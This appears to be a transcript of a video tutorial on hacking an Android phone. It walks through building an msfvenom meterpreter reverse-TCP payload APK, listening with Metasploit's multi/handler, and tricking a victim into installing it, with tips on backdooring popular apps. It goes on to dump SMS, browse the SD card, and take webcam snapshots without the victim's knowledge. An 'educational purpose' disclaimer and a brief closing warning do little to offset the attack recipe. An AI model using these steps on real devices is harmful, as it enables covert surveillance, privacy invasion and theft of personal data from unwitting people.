Hello friends, welcome to Random Tutorials. Today we are going to see how to hack an Android phone. This is just for educational purpose. This is to show how Android is insecure. So let's get started. Don't forget to subscribe my channel. First, we need to go to the open a terminal. In that terminal, we have to type the command msfvenom-p android meterpreter reverse tcp. This is the command to operate or to generate a payload using MSF framework. For that, you need to enter your IP address. To find your IP address, open up the terminal and type ifconfig. This will give you your IP address. Copy it and paste it in your code. Now, type the port where you want to access your victim. For example, here I am using the port 222. Then space R, which is a Java file, and name of your APK, which can be anything. For example, here I am taking virus.apk. APK must be in small letters. This will generate a payload. So the payload is successfully generated. Now the payload will be stored in your folder. See here. Now I will send this application to one of my friend, or I can also backdoor this application into any other application which is widely used. It can be any application. So let's go to the next command. In order to listen, I have to open MSF console. Now I have opened the console. Meanwhile, I will send my file to my friend. Since he is near me, I will be using USB cable to send my application file. Okay, the next command is use multi/handler. This will enable the handler. Next, you have to set the payload. Set space payload hyphen space android slash meterpreter slash reverse tcp, the same command which I have given above. And now I have to set the local host address. Set lhost space your IP address which you have given earlier. Now you have to set your port. Set lport, the same port which you have given earlier. Now you have to wait for your victim to touch your application. I am sending my virus file to my victim. You can also upload this into any of your websites or other malicious sites. I am putting in his internal storage. So I have successfully put my app here in his internal storage. Now when he will install the app, he will be affected. Let's see. Now you have to type exploit. Before typing, let us install the virus file in his mobile. So here you can see the virus APK which I just created. I am installing in his mobile. This will be just like a normal application. you can also backdoor this application. As soon as I click on open, the activity starts. So the activity has started. I'm installing it again. You can see the activate has started. So now you can exploit his phone to any extent. For example, you can see the commands through the help command. This will let you know all the commands. We can dump his SMS. His SMS will be stored in your files. For example, here. We can also check his root status. For example, CHEK. This will show you the device is rooted. You can also navigate through his SD card without his permission. For example, I am going to his SD card, CD SD card. CD, as I said earlier, is the change directory command, and SD card tells you the directory. If I list his SD card, you can find all the things which is present in his SD card. See, the virus file which I sent him is also present in his SD card. Now, you can download anything from his SD card or even send any other virus file to his SD card. This video is only for educational purpose. Now, you can also do many commands like record mic, webcam snap, webcam stream, webcam list, etc. For example, let me show you webcam snap. So his camera has started and it has got the frame. See, this is the image which his camera has taken without his knowledge. So these kind of applications can be generated and easily inserted in your phones. In order to avoid this kind of virus in your phone, please do download all the apps only from Google source. Do not accept any other source files. There may be many other phishing activities like pro versions of the file or any other version of the file or the latest version of the file. Please do not download these applications. Only trust Google application. Thank you. Please do subscribe for more videos.